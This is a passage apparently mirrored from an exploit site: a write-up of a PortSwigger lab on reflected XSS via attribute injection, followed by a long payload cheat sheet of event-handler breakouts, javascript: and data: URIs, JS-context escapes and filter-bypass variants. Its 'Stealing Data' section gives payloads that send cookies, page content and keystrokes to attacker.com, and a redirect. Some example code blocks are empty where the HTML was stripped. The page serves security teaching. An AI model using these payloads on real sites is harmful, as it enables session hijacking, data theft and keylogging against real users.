Share
## https://sploitus.com/exploit?id=7A836EAE-19D0-5630-AEC3-F3CE790D46C8
# Reflected XSS - Attribute Injection
A simple demonstration of XSS vulnerability when angle brackets are HTML-encoded.
## Lab Description
This lab contains a reflected XSS vulnerability in the search blog functionality where angle brackets are HTML-encoded. The goal is to perform an XSS attack that injects an attribute and calls the alert function.
**Source:** PortSwigger Web Security Academy
## The Problem
The application encodes `` characters but doesn't properly handle quotes in HTML attributes.
```html
```
## Solution
**Payload:**
```
" onmouseover="alert(1)
```
**How to exploit:**
1. Go to the search functionality
2. Enter the payload: `" onmouseover="alert(1)`
3. Submit the search
4. Move your mouse over the search input field
5. Alert will pop up
## Why it works
The payload breaks out of the attribute and creates a new event handler:
```html
```
## Other payloads you can use
## Mouse Events
```
" onmouseover="alert(1)
" onmouseout="alert(1)
" onmouseenter="alert(1)
" onmouseleave="alert(1)
" onmousemove="alert(1)
" onmousedown="alert(1)
" onmouseup="alert(1)
" onclick="alert(1)
" ondblclick="alert(1)
" oncontextmenu="alert(1)
" onwheel="alert(1)
```
## Keyboard Events
```
" onkeydown="alert(1)
" onkeyup="alert(1)
" onkeypress="alert(1)
```
## Form Events
```
" onfocus="alert(1)
" onblur="alert(1)
" onchange="alert(1)
" oninput="alert(1)
" onsubmit="alert(1)
" onreset="alert(1)
" oninvalid="alert(1)
" onsearch="alert(1)
```
## Loading Events
```
" onload="alert(1)
" onerror="alert(1)
" onabort="alert(1)
" onloadstart="alert(1)
" onloadend="alert(1)
" onprogress="alert(1)
```
## Drag & Drop Events
```
" ondrag="alert(1)
" ondragstart="alert(1)
" ondragend="alert(1)
" ondragenter="alert(1)
" ondragleave="alert(1)
" ondragover="alert(1)
" ondrop="alert(1)
```
## Media Events
```
" onplay="alert(1)
" onpause="alert(1)
" onended="alert(1)
" onvolumechange="alert(1)
" onseeking="alert(1)
" onseeked="alert(1)
" ontimeupdate="alert(1)
" oncanplay="alert(1)
```
## Animation & Transition Events
```
" onanimationstart="alert(1)
" onanimationend="alert(1)
" onanimationiteration="alert(1)
" ontransitionend="alert(1)
" ontransitionstart="alert(1)
```
## Touch Events (Mobile)
```
" ontouchstart="alert(1)
" ontouchmove="alert(1)
" ontouchend="alert(1)
" ontouchcancel="alert(1)
```
## Other Events
```
" onresize="alert(1)
" onscroll="alert(1)
" oncut="alert(1)
" oncopy="alert(1)
" onpaste="alert(1)
" onbeforeunload="alert(1)
" onhashchange="alert(1)
" onpageshow="alert(1)
" onpagehide="alert(1)
" onpointerdown="alert(1)
" onpointerup="alert(1)
" onpointermove="alert(1)
```
## JavaScript Protocol (In href/src/action)
```
javascript:alert(1)
javascript:alert(document.cookie)
javascript:alert(document.domain)
javascript:eval('alert(1)')
javascript:void(alert(1))
```
## Data URI Schemes
```js
data:text/html,alert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
data:text/html,
```
## Breaking Out of JavaScript Context
If you're already inside JavaScript code (between script tags or in JS string):
## String Context
```js
';alert(1);//
';alert(1);'
"+alert(1)+"
`+alert(1)+`
${alert(1)}
```
Object/Array Context
```js
});alert(1);//
];alert(1);//
```
Comment Bypass
```js
*/alert(1);//
```
Expression Contexts
Template Literals
```js
${alert(1)}
${alert`1`}
```
## JSON Context
```js
{"a":"a","b":"b"}};alert(1);//
```
## Advanced Attribute Injection
## With Single Quote
```js
' onmouseover='alert(1)
' onclick='alert(1)
' onfocus='alert(1)
```
## Without Quotes (Space-based)
```js
onmouseover=alert(1)
onclick=alert(1)
onfocus=alert(1)
```
## Using Backticks
```js
" onmouseover=`alert(1)`
```
## Polyglot Payloads (Work in Multiple Contexts)
```js
" onclick="alert(1)" "
' onclick='alert(1)' '
"onmouseover="alert(1)
```
## Special Attribute Contexts
## Form Actions
```js
" formaction="javascript:alert(1)
" action="javascript:alert(1)
Links
" href="javascript:alert(1)
```
## iFrame srcdoc
```js
" srcdoc="alert(1)
Case Variations (Bypass Filters)
" OnMoUsEoVeR="alert(1)
" ONCLICK="alert(1)
" oNlOaD="alert(1)
Alternative JavaScript Functions
Instead of alert(1), you can use:
confirm(1)
prompt(1)
console.log(1)
document.write(1)
eval('alert(1)')
Function('alert(1)')()
setTimeout('alert(1)',0)
setInterval('alert(1)',0)
location='javascript:alert(1)'
```
# Stealing Data (Real Attack Examples)
## Steal Cookies
```js
" onmouseover="fetch('https://attacker.com?c='+document.cookie)
" onclick="new Image().src='https://attacker.com?c='+document.cookie
```
## Steal Page Content
```js
" onload="fetch('https://attacker.com',{method:'POST',body:document.body.innerHTML})
```
## Redirect
```js
" onclick="location='https://attacker.com'
Keylogger
" onload="document.onkeypress=function(e){fetch('https://attacker.com?k='+e.key)}
Context-Specific Payloads
Inside Input Value
" autofocus onfocus="alert(1)
" accesskey="x" onclick="alert(1)
Inside IMG src
" onerror="alert(1)
x" onerror="alert(1)
Inside A href
javascript:alert(1)
" onclick="alert(1)" href="#
```
## How to prevent this
1. Always encode quotes in HTML attributes
2. Use Content Security Policy (CSP)
3. Validate user input
4. Use modern frameworks that auto-escape (React, Vue, Angular)